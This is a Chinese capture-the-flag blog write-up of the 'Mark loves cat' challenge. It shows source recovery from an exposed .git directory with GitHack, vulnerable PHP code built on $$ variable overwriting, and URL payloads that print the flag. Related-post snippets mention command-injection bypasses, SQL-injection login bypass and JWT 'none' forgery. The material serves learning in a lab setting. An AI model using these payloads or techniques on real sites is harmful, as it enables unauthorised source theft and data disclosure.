[BJDCTF2020]Mark loves cat(.git源码泄露与代码审计之变量覆盖漏洞)

最新推荐文章于 2021-02-12 23:03:41 发布
最新推荐文章于 2021-02-12 23:03:41 发布
阅读量278 收藏
点赞数
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/113649425
版权

知识点:

  • php中$$用来定义可变变量

在这里插入图片描述
解题:

python GitHack.py http://e6e2adea-991f-4ae7-b4ea-0f82d49d8f8c.node3.buuoj.cn/.git/

得到源码

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y; #若传入x=y,则$x=y
}

foreach($_GET as $x => $y){
    $$x = $$y;   #若传入x=y,则$x=$y
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);//遍历传入的get参数,当参数的key名不是flag,且key名为flag的value又要等于当前的key,即当存在key!='flag',而flag=key
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);#没有设置flag则进入
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);#设置了flag键值即进入
}



echo "the flag is: ".$flag;

?>

分析:
表面上是存在四种方法输出flag(三种exit输出和一种echo输出)
第一种:
这种形式输出flag,由于是输出handsome,所以要想办法使得$handsome=$flag,很明显我们可以利用第二个foreach实现,所以传入参数之一handsome=flag
接下来就先想办法设置flag的值了,引用前面分析即当存在key!='flag',而flag=key
构造payload

handsome=flag&flag=handsome#z注意不能更换顺序,若flag在前,则$flag=$handsome,flag的值被改变了

第二种:
首先不能传入参数flag,否则不会进入第二种循环,其次输出的变量是yds,所以要将$yds=$flag
构造payload

yds=flag

第三种

flag=flag&is=flag

第四种还没想到…

行于其野
关注
专栏目录
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
2020/7/08 - [BJDCTF2020]Mark loves cat - git源码泄露/$$变量覆盖
抒情诗
07-08 264
文章目录可以利用yds就是原值为cat的那个最终payload 首先用dirsearch扫描一下目录,发现/.git源码泄露,使用githack将源码下载下来,在github里面搜lijiejie的githack,真的很好用,点一大波赞,下面是index.php里有用的内容 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x
审计练习18——[BJDCTF2020]EzPHP
qq_43756333的博客
06-30 547
平台:buuoj.cn 打开靶机加载来自卡巴斯基网络威胁实时地图,控制台查看源码发现base64,解码得1nD3x.php 访问得源码 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<br /><font color=
git源码泄露漏洞
火柴人的博客
03-15 452
先把别人的放在这里用用,等以后自己在做个总结。 git源码泄露漏洞总结
------已搬运-------BUUCTF:[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞
Zero_Adam的博客
02-12 439
主要锻炼一下变量覆盖那些绕绕的东西。 git泄露,,这个还没好,等问问班长的 获得源码后: index.php <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as $x => $y
git 泄露 源码审计 php 弱类型
MIGENGKING的博客
10-20 342
Git源码泄露普遍发生于一些小型企业(当然大型企业也存在),由资金不足,公司可能没有自己的专属服务器,于是会将网站部署到虚拟机里,由于在多数情况下FTP上传文件较慢,于是程序员多选择将源码打包以后上传,上传以后在进行解压,虽然这样子看上去省时省力,但是其实留下了不少的安全隐患,一旦程序员忘记将压缩包删除,攻击者便可以获取源码,在自己的服务器上部署源码从而获取更多的安全漏洞。我们常用的到的工具为王一...
www.tukeji.com__存在GIT源码泄露漏洞1
08-08
标题中的“www.tukeji.com__存在GIT源码泄露漏洞1”表明该网站存在一个严重的安全问题,即Git源码泄露。这个问题源自于网站的开发者在发布代码时没有正确处理`.git`目录,导致攻击者可以下载并利用该目录中的信息来...
git源码压缩包v2.42.0
最新发布
09-21
Git的强大之处还在于其丰富的命令行工具,如`git clone`用于克隆远程仓库,`git add`用于暂存更改,`git commit`用于提交更改,`git push`用于将本地更改推送到远程仓库,以及`git pull`用于从远程仓库拉取最新的...
dumpall:一种信息泄漏利用工具,适用于.git.svn源代码泄漏和.DS_Store泄漏
03-24
:sign_of_the_horns: 特征支持多种泄漏情况利用Dumpall使用方式简单使用asyncio异步处理速度快适用于以下场景: .git源代码泄漏 .svn源代码泄漏 .DS_Store信息泄漏目录列出信息泄漏去做:支持更多利用方式优化大...
Bonobo.Git.Server
06-06
《Bonobo.Git.Server:构建本地Git服务器的全方位指南》 Bonobo.Git.Server是一款开源的应用程序,专为Windows环境设计,用以搭建和管理本地Git服务器。它提供了直观的Web界面,使得团队协作和代码版本控制变得...
buuctf php(扫描网站备份文件和反序列化漏洞)
qq_44111753的博客
12-30 1143
知识点: 1、扫描网站备份文件 别人写的备份文件url生成字典脚本 import os import os.path import requests from urllib.parse import unquote suffixList = ['.rar','.zip','.tar','.tar.gz'] keyList = ['www','wwwroot','site','web','website','backup','data','mdb','WWW','新建文件夹','ceshi','databa
buuctf [HCTF 2018]admin(flask cookie伪造)
qq_44111753的博客
01-02 1087
知识点 1、flask cookie伪造 2、flask中的SECRET_ KEY值作用 Flask、Django的 secret key 设置有什么用? SECRET_KEY配置变量是通用密钥,可在Flask和多个第三方扩展中使用其名所示,加密的强度取决于变量值的机密度.不同的程序要使用不同的密钥,而且要保证其他人不知道你所用的字符串,SECRET_KEY的作用主要是提供一个值做各种HASH,主要的作用应该是在其加密过程中作为算法的一个参数(salt或其他).所以这个值的复杂度也就影响到了数据传输和存储
buuctf BabySQli
qq_44111753的博客
01-02 1045
随便输入,发现一串密文,数字+大写字母,大概是采用base32加密 base32解密如下,有“=”,猜测是base64加密 base64解密如下 查询后台数据库username等于输入值得所有数据 后台数据库的登录逻辑大概是:将输入的用户名与后台数据库中的所有用户名做比较,找出相等的,然后用这组数据的密码与用户输入的密码作比较,若相等,则登录成功 重要点:放置于后台的数据库大概率是经过hash加密的 操作:在用户名框注入 1’ union select ‘admin’,加密后的密码 为了使登录成功,注入
[网鼎杯 2020 朱雀组]phpweb(各种读取文件函数,call_user_func()函数和序列化绕过)
qq_44111753的博客
02-04 796
知识点 读取文件的方法 readfile,file_get_contents,highlight_file call_user_func() 第一个参数 callbac 是被调用的回调函数,其余参数是回调函数的参数 序列化 题解: 由于页面不断刷新,所以抓包分析下 post传入了参数data和一串类似日期格式的东西 合理推测是使用了call_user_func()函数,并将date()作为回调函数,由此输出了上面红色框部分 func=readfile&p=index.php
[De1CTF 2019]SSRF Me(Flask框架的代码审计
qq_44111753的博客
02-04 755
参考文章:Flask框架快速入门学习 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) sec
攻防世界之PHP2
qq_44111753的博客
11-17 593
题目: WP: 打开题目,查看了源码,挺莫名其妙的 搜索后发现,可以访问index.phps–index.php的源代码 php源码文件为phps,url会自动解码一次 分析代码可知,我们要得到key是第一个if的时候,要使id不等于admin,但经过url解码后,又要等于admin, 提一下url编码:%+字符对应的US-ASCII url中id的值传入后,页面解析时会自动自动进行url解码一次,所以我们可以将 a进行两次编码,第一次编码%61,第二次编码后为%2561,令id=% ...
[GXYCTF2019]Ping Ping Ping(linux命令下绕过)
qq_44111753的博客
01-03 535
1、绕过空格 ${IFS} $IFS$9 ?ip=1%20|%20ls 提示不能使用空格 ?ip=1|ls 发现了flag.php和index.php cat${IFS}flag.php 好像有什么符号又被过滤了,换一种空格绕过?ip=1|cat$IFS$9flag.php flag被过滤了 那就看看index.php吧 发现flag四个字符按照顺序排列被绕过了 ...
[ZJCTF 2019]NiZhuanSiWei(伪协议读取文件)
qq_44111753的博客
02-02 495
0x01 知识点 1、data协议用于数据流的读取 data://text/plain;base64,xxxx(base64编码后的数据) data伪协议只有在php<5.3且allow_url_fopen :on,allow_url_include:on时可以写木马。 2、php伪协议:可结合文件包含漏洞读取文件源码或执行文件 需要开启allow_url_fopen的:php://input、php://stdin、php://memory和php://temp 不需要开启allow_wrl_fo
[HFCTF2020]EasyLogin(node.js的koa框架、jwt攻击方法)
qq_44111753的博客
02-11 426
1、node.js koa的主要框架目录 创建一个rest-hello的工程,结构; 2、jwt攻击方法 深入了解Json Web Token之概念篇 深入了解Json Web Token之实战篇 总的来说,jwt由三部分组成:Header.Payload.Signature。攻击的办法之一可以把header中alg字段更改为’none’,且Payload的secretid为空,即没有Signature 因为sid为空时,jwt将采用none algorithm解密,即对应了将alg='none’的加密
变量覆盖漏洞分析:从BUUCTF-Web-Mark loves cat挑战看PHP安全
此外,还介绍了如何利用变量覆盖漏洞,并通过一个具体的CTF(Capture The Flag)挑战实例来展示如何通过分析网站源代码和利用.git泄露来获取敏感信息。" 在PHP编程中,变量覆盖漏洞是一个重要的安全问题,它发生在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值